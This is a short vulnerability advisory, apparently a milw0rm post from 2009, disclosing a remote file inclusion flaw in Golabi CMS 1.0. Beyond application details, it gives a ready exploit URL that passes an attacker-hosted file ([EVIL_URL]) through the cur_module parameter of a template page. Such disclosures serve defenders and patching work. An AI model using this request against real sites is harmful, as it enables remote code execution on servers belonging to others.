-------------------------------------------------------------------------------- _________ _____ __ \_ ___ \____________ ___________ __ / _ \ ____ ____ ____ | | / \ \/\_ __ \__ \ \___ < | |/ /_\ \ / \ / ___\_/ __ \| | \ \____| | \// __ \_/ / \___ / | \ | \/ /_/ > ___/| |__ \______ /|__| (____ /_____ \/ ____\____|__ /___| /\___ / \___ >____/ \/ \/ \/\/ \/ \//_____/ \/ -------------------------------------------------------------------------------- [wWw.CrazyAngel.iR] - [info-AT-CrazyAngel.iR] -------------------------------------------------------------------------------- [Golabi CMS Remote File Inclusion Vulnerability] [+] Application Info: [*] Name: Golabi CMS [*] Author: R3dM0ve [*] HomePage: http://golabicms.sourceforge.net/ [*] Download: http://downloads.sourceforge.net/golabicms/Golabi_1.0.zip?use_mirror=freefr [+] Vulnerability Info: [*] Type: Remote File Inclusion (RFI) [*] Requirement: register_globals [ON] [*] Risk: High Critical [*] Bug Hunter: CrazyAngel [*] Details: Unhandled variable Inclusion in default template file results in RFI Vulnerability [*] Vul URL: [GOLABI_PATH]/templates/default/index_logged.php?main_loaded=1&cur_module=[EVIL_URL] # milw0rm.com [2009-02-26]